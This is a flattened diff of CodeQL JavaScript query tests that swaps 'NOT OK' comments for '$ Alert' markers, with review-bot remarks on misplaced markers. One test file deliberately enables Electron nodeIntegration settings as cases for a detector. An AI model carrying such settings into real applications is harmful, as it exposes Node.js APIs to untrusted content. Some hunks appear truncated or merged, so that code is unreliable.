// OK + isBranchNode(node: Node): node is BranchNode { return false; // This model has no branches. } - isValidNode(node: Node): boolean { // NOT OK + isValidNode(node: Node): boolean { // $ Alert return Node != null; // woops } } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts index fe32f6e80ea5..6ca356434eaf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts 
@@ -1,7 +1,7 @@ class C { - constructor(public x: number) {} // OK + constructor(public x: number) {} } class D { - constructor(x: number) {} // NOT OK + constructor(x: number) {} // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts index 264928281a32..84aff19d331a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts @@ -1,3 +1,3 @@ -function foo(this: void, x: number) { // OK: 'this' is not an ordinary parameter +function foo(this: void, x: number) { // OK - 'this' is not an ordinary parameter return x; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js index cb7a02387c21..7e367fc67dfa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js @@ -1,28 +1,26 @@ -// OK + [1, , 3].forEach(function(elt, idx) { console.log(idx + " is not omitted."); }); -// NOT OK -[1, , 3].forEach(function(elt, idx) { +[1, , 3].forEach(function(elt, idx) { // $ Alert sum += elt; }); -// NOT OK -function f1(x, y) { +function f1(x, y) { // $ Alert return y; } f1(23, 42); -// OK + function f2(x, y) { return y; } [].map(f2); -// OK + function f3(x, y) { return y; } @@ -30,11 +28,11 @@ function f3(x, y) { var g = f3; [].map(g); -// OK + define(function (require, exports, module) { module.x = 23; }); -// OK: starts with underscore +// OK - starts with underscore function f(_p) { } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js index 7621dca4b0da..17f6b2c218f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js 
+++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js @@ -1,18 +1,18 @@ -function f(x, y) { // NOT OK +function f(x, y) { // $ Alert return y; } -function g(x, y) { // OK +function g(x, y) { return y + arguments[0]; } -function h(x) { // OK +function h(x) { function inner() { x = 1; } } -// OK + /** * @param {*} x the first argument, deliberately unused * @param {*} y the second argument @@ -21,8 +21,7 @@ function K(x, y) { return y; } -// NOT OK -/** +/** // $ Alert * @param {*} x the first argument * @param {*} y the second argument */ @@ -30,7 +29,7 @@ function K(x, y) { return y; } -// OK + /** * @abstract * @param {*} x the first argument diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx index ac3df7f815ce..a8c86768ad1a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx @@ -1,4 +1,4 @@ import { h } from 'preact'; // OK - JSX element uses 'h' after babel compilation -import { q } from 'preact'; // NOT OK - not used +import { q } from 'preact'; // $ Alert - not used export default (
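Review bot: In `UnusedParameter/tst2.js` the new marker ended up inside the JSDoc opener, `/** // $ Alert`, so it is block-comment text several lines above the declaration it describes (presumably `function K(x, y)`, going by the next hunk header). If the expectation parser only reads comments whose text starts with `$` and matches them by line, which is worth confirming, this expectation is never checked. I would restore the plain `/**` and annotate the declaration instead, `function K(x, y) { // $ Alert`. The same mechanical pattern shows up later in this patch as `// prints 'true' // $ Alert` in `BitwiseSignCheck/tst.js` and as `/** Useless */ // $ Alert` on the line above `x;` in `ExprHasNoEffect/tst.js`. The declaration itself lies outside this hunk.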
    Hello
    ); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index a77c7545deee..7d76d97b96bb 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++Hello); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts index 0fa2f18066c0..16e81a7f19de 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts @@ -1,10 +1,10 @@ -// OK: `SomeInterface` is used in an `implements` clause +// OK - `SomeInterface` is used in an `implements` clause import SomeInterface from 'somewhere'; class SomeClass implements SomeInterface { } new SomeClass(); -import SomethingElse from 'somewhere'; // OK: SomethingElse is used in a type +import SomethingElse from 'somewhere'; // OK - SomethingElse is used in a type type T = `Now for ${SomethingElse}`; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts index bdcd767fae80..708ef01ba929 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts @@ -1,4 +1,4 @@ -import { Foo, Bar } from "somewhere"; // OK +import { Foo, Bar } from "somewhere"; type FooBar = T extends [infer S extends Foo, ...unknown[]] 
diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts index 8749b3b059e4..336c20798120 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts @@ -1,6 +1,6 @@ -import * as X from "x"; // OK -import * as Y from "y"; // OK -import * as Z from "z"; // NOT OK +import * as X from "x"; +import * as Y from "y"; +import * as Z from "z"; // $ Alert function f(x: X) {} function g(x: Y.T) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js index 70e8264f7050..5478d1d02da7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js @@ -1,2 +1,2 @@ -// OK + module.exports = class C {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js index ac9bf939e31e..8c43db101c4f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js @@ -1,2 +1,2 @@ -var React = x; // OK +var React = x; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js index a68c0456cdf8..f58715a8a9b0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js @@ -1,2 +1,2 @@ -var React = require("probably-react"); // OK +var React = require("probably-react"); (); 
diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js index 7137d8a44a9d..c6bcc81929e6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js @@ -1,2 +1,2 @@ -var { React } = { React: require("probably-react") }; // OK +var { React } = { React: require("probably-react") }; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js index 580680cdb682..c40e6c565daf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js @@ -1,2 +1,2 @@ -var { React } = require("probably-react"); // OK +var { React } = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js index 9ba55169e39d..11f6763cf3f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js @@ -1,5 +1,5 @@ (function() { - var React = require("probably-react"); // NOT OK + var React = require("probably-react"); // $ Alert }) (function() { (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts index 07f817e287a8..5791afc6ed5c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts 
@@ -1,4 +1,4 @@ -import { Foo, Bar, Baz } from "somewhere"; // OK +import { Foo, Bar, Baz } from "somewhere"; export function f(this: Foo) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts index 8b157c18f8df..07c3bb0c50dc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts @@ -1,6 +1,6 @@ -import { SomeInterface } from 'somwhere1'; // OK -import { AnotherInterface } from 'somwhere2'; // OK -import { foo } from 'somewhere3'; // OK +import { SomeInterface } from 'somwhere1'; +import { AnotherInterface } from 'somwhere2'; +import { foo } from 'somewhere3'; let x = "world"; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts index 3a4c417daec3..5c5085a37285 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts @@ -1,12 +1,12 @@ -import fs = require('fs') // OK -import http = require('http') // OK +import fs = require('fs') +import http = require('http') export var mockFs : typeof fs = {} export var mockRequest : typeof http.ServerRequest = {} export function f() { - let x = 4 // OK - let y = 5 // NOT OK + let x = 4 + let y = 5 // $ Alert var t : typeof x = 20 return t } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts index 130a2a1db926..62a86545a4e0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts 
@@ -1 +1 @@ -declare class UnusedClass {} // OK +declare class UnusedClass {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js index 75eade9c6f82..e25cb72b32a5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js @@ -1,10 +1,10 @@ function f(a) { - const [a, // OK: used - _, // OK: starts with underscore - _c, // OK: starts with underscore - d, // OK: used - e, // NOT OK - f] // NOT OK + const [a, // OK - used + _, // OK - starts with underscore + _c, // OK - starts with underscore + d, // OK - used + e, // $ Alert + f] // $ Alert = a; return a + d; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts index 14ec99e02b5c..a04efbed8e1c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts @@ -1,6 +1,6 @@ -import T from 'somewhere'; // NOT OK: `T` is unused (it is shadowed by another T) -import object from 'somewhere'; // NOT OK: `object` is unused (it is "shadowed" by a keyword) -import * as N from 'somewhere'; // OK: N is a namespace and thus not shadowed by 'interface N'. +import T from 'somewhere'; // $ Alert - `T` is unused (it is shadowed by another T) +import object from 'somewhere'; // $ Alert - `object` is unused (it is "shadowed" by a keyword) +import * as N from 'somewhere'; // OK - N is a namespace and thus not shadowed by 'interface N'. { var x: T = {}; diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e1d0e95fb43..7cc8b5e4d5fb 100644 
--- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -1,7 +1,7 @@ const {BrowserWindow} = require('electron') function test() { - var unsafe_1 = { // NOT OK, both enabled + var unsafe_1 = { // $ Alert - both enabled webPreferences: { nodeIntegration: true, nodeIntegrationInWorker: true, @@ -11,7 +11,7 @@ function test() { } }; - var options_1 = { // NOT OK, `nodeIntegrationInWorker` enabled + var options_1 = { // $ Alert - `nodeIntegrationInWorker` enabled webPreferences: { plugins: true, nodeIntegrationInWorker: false, @@ -20,13 +20,13 @@ function test() { } }; - var pref = { // NOT OK, implicitly enabled + var pref = { // $ Alert - implicitly enabled plugins: true, webSecurity: true, sandbox: true }; - var options_2 = { // NOT OK, implicitly enabled + var options_2 = { // $ Alert - implicitly enabled webPreferences: pref, show: true, frame: true, @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // NOT OK, explicitly disabled + var safe_used = { // $ Alert - explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, @@ -46,7 +46,7 @@ function test() { var w1 = new BrowserWindow(unsafe_1); var w2 = new BrowserWindow(options_1); var w3 = new BrowserWindow(safe_used); - var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // NOT OK, `nodeIntegration` enabled + var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // $ Alert - `nodeIntegration` enabled var w5 = new BrowserWindow(options_2); var w6 = new BrowserWindow(safe_used); } diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js index 3006b9d28826..4ee166b91873 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js 
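Review bot: The free text kept after the new markers in `EnablingNodeIntegration.js` contradicts the visible code in two places. `options_1` is annotated `// $ Alert - `nodeIntegrationInWorker` enabled` while the hunk shows `nodeIntegrationInWorker: false`, and `safe_used` is annotated `// $ Alert - explicitly disabled` directly above `nodeIntegration: false`. The wording was inherited from the old `NOT OK` comments, but this file records which `webPreferences` shapes the query reports as giving renderer content access to Node.js APIs, so a reader will take the trailing text as the reason for the alert. Unless the reason is checked against the query, I would drop it and keep only the marker, e.g. `var options_1 = { // $ Alert`. Parts of `test()` lie between these hunks.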
+++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js @@ -6,18 +6,16 @@ console.log(bitIsSet(-1, 31)); // prints 'false' (x & 3) > 0; // this is fine -// OK + x = -1; console.log((x | 0) > (0)); // prints 'false' -// NOT OK -console.log((x >>> 0) > 0); // prints 'true' +console.log((x >>> 0) > 0); // prints 'true' // $ Alert + -// OK console.log((x << 16 >> 16) > 0); // prints 'false' -// OK + (x & 256) > 0; -// NOT OK -(x & 0x100000000) > 0; \ No newline at end of file +(x & 0x100000000) > 0; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js index e6b2568239f0..82c34116c62e 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js @@ -12,34 +12,33 @@ Rectangle.prototype.contains = function(x, y) { y < this.y+this.height); }; -// OK + "true" == true; -// OK + f() != f(23); -// NOT OK -(function() { }) == (function() {}); +(function() { }) == (function() {}); // $ Alert + - // OK x === y; -// OK + true === false; -// OK + function isNan(n) { return n !== n; } -// OK + function checkNaN(x) { if (x === x) // check whether x is NaN return false; return true; } -// OK (though wrong in other ways) +// OK - though wrong in other ways function same(x, y) { if (x === y) return true; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js index 3bf5add29910..aa9e955fdd08 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js 
@@ -1,12 +1,12 @@ var duplicate = { - "key": "value", // NOT OK: duplicated on line 5 + "key": "value", // $ Alert - duplicated on line 5 " key": "value", - "1": "value", // NOT OK: duplicated on line 11 - "key": "value", // NOT OK: duplicated on next line - 'key': "value", // NOT OK: duplicated on next line - key: "value", // NOT OK: duplicated on next line - \u006bey: "value", // NOT OK: duplicated on next line - "\u006bey": "value", // NOT OK: duplicated on next line + "1": "value", // $ Alert - duplicated on line 11 + "key": "value", // $ Alert - duplicated on next line + 'key': "value", // $ Alert - duplicated on next line + key: "value", // $ Alert - duplicated on next line + \u006bey: "value", // $ Alert - duplicated on next line + "\u006bey": "value", // $ Alert - duplicated on next line "\x6bey": "value", 1: "value" }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js index f543395bc87c..07a81208a4ce 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js @@ -1,6 +1,6 @@ function* foo(){ var index = 0; while(index <= 2) - // OK + yield index++; } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js index 2bb1d46c4062..6b5b599f4b00 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js @@ -20,7 +20,7 @@ var myComplicatedPropertyDescriptor = (function(k) { })("get"); Object.defineProperty(Object.prototype, 'foo', myComplicatedPropertyDescriptor); -// OK: getters +// OK - getters (false).should.be.ok; (false).should; should.prototype.be; 
diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js index a665423bd815..36bf5253ebdf 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js @@ -19,7 +19,7 @@ function try2(x) { function try3(x) { try { x.ordinaryProperty() - x.ordinaryProperty // NOT OK + x.ordinaryProperty // $ Alert return x; } catch (e) { return false; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js index e58a785b5aac..11fde389f858 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js 
@@ -1,83 +1,82 @@ -'use strict'; // OK -'use struct'; // OK (flagged by UnknownDirective.ql) -23; // NOT OK -void(23); // OK -23, foo(); // NOT OK -foo(23, 42); // OK -foo((23, bar())); // NOT OK -foo((bar(), 23)); // OK -1,f(); // NOT OK - -// OK +'use strict'; +'use struct'; // OK - flagged by UnknownDirective.ql +23; // $ Alert +void(23); +23, foo(); // $ Alert +foo(23, 42); +foo((23, bar())); // $ Alert +foo((bar(), 23)); +1,f(); // $ Alert + + /** * @type {function(int) : string} */ String.prototype.slice; -// OK + /** @typedef {(string|number)} */ goog.NumberLike; -// NOT OK -/** Useless */ +/** Useless */ // $ Alert x; -// OK (magic DOM property) +// OK - magic DOM property elt.clientTop; -// OK (xUnit fixture) +// OK - xUnit fixture [Fixture] function tst() {} -// OK: bad style, but most likely intentional +// OK - bad style, but most likely intentional (0, o.m)(); (0, o["m"])(); function tst() { - // OK: bad style, but most likely intentional + // OK - bad style, but most likely intentional (0, eval)("42"); } function f() { var x; - "foo"; // NOT OK + "foo"; // $ Alert } try { doSomethingDangerous(); } catch(e) { - new Error("Told you so"); // NOT OK - new SyntaxError("Why didn't you listen to me?"); // NOT OK - new Error(computeSnarkyMessage(e)); // NOT OK - new UnknownError(); // OK + new Error("Told you so"); // $ Alert + new SyntaxError("Why didn't you listen to me?"); // $ Alert + new Error(computeSnarkyMessage(e)); // $ Alert + new UnknownError(); } function g() { var o = {}; Object.defineProperty(o, "trivialGetter1", { get: function(){} }); - o.trivialGetter1; // OK + o.trivialGetter1; Object.defineProperty(o, "trivialNonGetter1", "foo"); - o.trivialNonGetter1; // NOT OK + o.trivialNonGetter1; // $ Alert var getterDef1 = { get: function(){} }; Object.defineProperty(o, "nonTrivialGetter1", getterDef1); - o.nonTrivialGetter1; // OK + o.nonTrivialGetter1; var getterDef2 = { }; unknownPrepareGetter(getterDef2); Object.defineProperty(o, 
"nonTrivialNonGetter1", getterDef2); - o.nonTrivialNonGetter1; // OK + o.nonTrivialNonGetter1; Object.defineProperty(o, "nonTrivialGetter2", unknownGetterDef()); - o.nonTrivialGetter2; // OK + o.nonTrivialGetter2; - (o: empty); // OK + (o: empty); - testSomeCondition() ? o : // NOT OK + testSomeCondition() ? o : // $ Alert doSomethingDangerous(); - consume(testSomeCondition() ? o : // OK + consume(testSomeCondition() ? o : doSomethingDangerous()); }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js index 62f64f2f729a..0e66a95c166e 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js @@ -1,4 +1,3 @@ function tst2(eval) { - // NOT OK - (0, eval)("42"); + (0, eval)("42"); // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js index f500d4cdafce..a3b6b1fea45e 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js 
@@ -1,137 +1,128 @@ -// NOT OK -if (typeof window !== undefined) +if (typeof window !== undefined) // $ Alert console.log("browser"); -// OK + if (typeof window === "undefined") console.log("not a browser"); -// NOT OK -if ("Hello, world".indexOf("Hello" >= 0)) +if ("Hello, world".indexOf("Hello" >= 0)) // $ Alert console.log("It's in there."); -// OK + true < 1; -// OK + undefined == null; -// NOT OK -null == 0; +null == 0; // $ Alert -// NOT OK -switch ("hi") { +switch ("hi") { // $ Alert case 42: } -// NOT OK -Object.toString() + "!" == undefined; +Object.toString() + "!" == undefined; // $ Alert -// NOT OK -(+f() || !g() || (h() + k())) == undefined; +(+f() || !g() || (h() + k())) == undefined; // $ Alert -// NOT OK -if (!Module['load'] == 'undefined') { +if (!Module['load'] == 'undefined') { // $ Alert } function f(x) { return true; - // OK + return x === 42; } function g() { var number = 0; // number - // OK + number == "0"; - // NO OK - number == "zero"; + + number == "zero"; // $ Alert } -// NOT OK -0 < (Math.random() > 0.5 ? void 0 : [1, 2]); +0 < (Math.random() > 0.5 ? 
void 0 : [1, 2]); // $ Alert + -// OK '100' < 1000; -// OK (fvsvo "OK") +// OK - fvsvo "OK" 100 > ''; -// OK + new Date('foo') == 'Invalid Date'; -// OK + new String('bar') == 'bar'; -// OK + ({ valueOf: () => true } == true); -// OK + ({ valueOf: () => 42 } == 42); -// OK + ({ valueOf: () => 'hi' } == 'hi'); -// OK + ({ valueOf: () => null } == null); -// NOT OK, but not currently flagged since we conservatively -// assume that `new Date(123)` could return any object, not necessarily a Date +// assume that `new Date(123)` could return any object, not necessarily a Date // $ Alert - but not currently flagged since we conservatively new Date(123) == 123 function f(x1, x2, x3, x4, x5, x6){ - typeof x1 === 'object' && x1 !== null; // OK + typeof x1 === 'object' && x1 !== null; if (!x2) { x2 = new Error(); } - typeof x2 === 'object' && x2 !== null; // NOT OK: x2 cannot be null here + typeof x2 === 'object' && x2 !== null; // $ Alert - x2 cannot be null here if (x3) { - typeof x3 === 'object' && x3 !== null; // NOT OK: x3 cannot be null here + typeof x3 === 'object' && x3 !== null; // $ Alert - x3 cannot be null here } if (!x4) { - typeof x4 === 'object' && x4 !== null; // OK + typeof x4 === 'object' && x4 !== null; } if (!x5) { x5 = new Error(); } - x5 !== null; // NOT OK: x2 cannot be null here + x5 !== null; // $ Alert - x2 cannot be null here if (x6) { - x6 !== null; // NOT OK: x3 cannot be null here + x6 !== null; // $ Alert - x3 cannot be null here } } function g() { var o = {}; - o < "def"; // NOT OK + o < "def"; // $ Alert var p = { toString() { return "abc"; } }; - p < "def"; // OK + p < "def"; function A() {} var a = new A(); - a < "def"; // NOT OK + a < "def"; // $ Alert function B() {}; B.prototype = p; var b = new B(); - b < "def"; // OK + b < "def"; function C() { this.valueOf = function() { return 42; }; } var c = new C(); - c != 23; // OK + c != 23; null.valueOf = function() { return 42; }; - null == 42; // NOT OK + null == 42; // $ Alert true.valueOf = 
function() { return "foo" }; - true != "bar"; // NOT OK + true != "bar"; // $ Alert } @@ -139,54 +130,54 @@ function h() { var a = 42; var b = "42"; - a === "42"; // NOT OK - 42 === b // NOT OK - a === b; // NOT OK + a === "42"; // $ Alert + 42 === b // $ Alert + a === b; // $ Alert } function i() { "foo" === undefined - undefined === "foo" // NOT OK + undefined === "foo" // $ Alert var NaN = 0; // trick analysis to consider warning about NaN, for the purpose of testing pretty printing - NaN === "foo" // NOT OK + NaN === "foo" // $ Alert var Infinity = 0; // trick analysis to consider warning about Infinity, for the purpose of testing pretty printing - Infinity === "foo" // NOT OK + Infinity === "foo" // $ Alert } function k() { // tests for pretty printing of many types var t1 = 42; - t1 !== null; // NOT OK - null !== t1; // NOT OK + t1 !== null; // $ Alert + null !== t1; // $ Alert var t2 = unknown? t1: "foo"; - t2 !== null; // NOT OK - null !== t2; // NOT OK + t2 !== null; // $ Alert + null !== t2; // $ Alert var t3 = unknown? t2: undefined; - t3 !== null; // NOT OK - null !== t3; // NOT OK + t3 !== null; // $ Alert + null !== t3; // $ Alert var t4 = unknown? t3: true; - t4 !== null; // NOT OK - null !== t4; // NOT OK + t4 !== null; // $ Alert + null !== t4; // $ Alert var t5 = unknown? t4: function(){}; - t5 !== null; // NOT OK - null !== t5; // NOT OK + t5 !== null; // $ Alert + null !== t5; // $ Alert var t6 = unknown? t5: /t/; - t6 !== null; // NOT OK - null !== t6; // NOT OK + t6 !== null; // $ Alert + null !== t6; // $ Alert var t7 = unknown? t6: {}; - t7 !== null; // NOT OK - null !== t7; // NOT OK + t7 !== null; // $ Alert + null !== t7; // $ Alert var t8 = unknown? t8: new Symbol(); - t8 !== null; // NOT OK - null !== t8; // NOT OK + t8 !== null; // $ Alert + null !== t8; // $ Alert } 
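Review bot: The rewritten comment above `new Date(123) == 123` in `HeterogeneousComparison/tst.js` marks the case as an expected alert while its own text says it is not flagged, and its two halves are now in the wrong order: `// assume that ... not necessarily a Date // $ Alert - but not currently flagged since we conservatively`. The marker also trails other comment text on the line before the comparison rather than sitting on the comparison itself. Elsewhere in this patch the same situation is written as `1n + 1; // $ MISSED: Alert`. I would restore the two-line explanation without the `NOT OK` prefix and annotate the statement as `new Date(123) == 123 // $ MISSED: Alert`.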
@@ -199,22 +190,22 @@ function l() { var t4 = unknown? 42: unknown? "foo": unknown? undefined: true; var t5 = unknown? t4: null - t2 !== t4; // NOT OK - t4 !== t2; // NOT OK - t3 !== t4; // NOT OK - t4 !== t3; // NOT OK + t2 !== t4; // $ Alert + t4 !== t2; // $ Alert + t3 !== t4; // $ Alert + t4 !== t3; // $ Alert - t2 !== t5; // NOT OK - t5 !== t2; // NOT OK - t3 !== t5; // NOT OK - t5 !== t3; // NOT OK + t2 !== t5; // $ Alert + t5 !== t2; // $ Alert + t3 !== t5; // $ Alert + t5 !== t3; // $ Alert } -1n == 1; // OK +1n == 1; (function tooGeneralLocalFunctions(){ function f1(x) { - if (x === "foo") { // OK, whitelisted + if (x === "foo") { // OK - whitelisted } } @@ -222,7 +213,7 @@ function l() { function f2(x, y) { var xy = o.q? x: y; - if (xy === "foo") { // NOT OK (not whitelisted like above) + if (xy === "foo") { // $ Alert - not whitelisted like above } } diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index 811ef9c576c9..523535b640e5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -1,41 +1,36 @@ -// NOT OK -!method in obj; 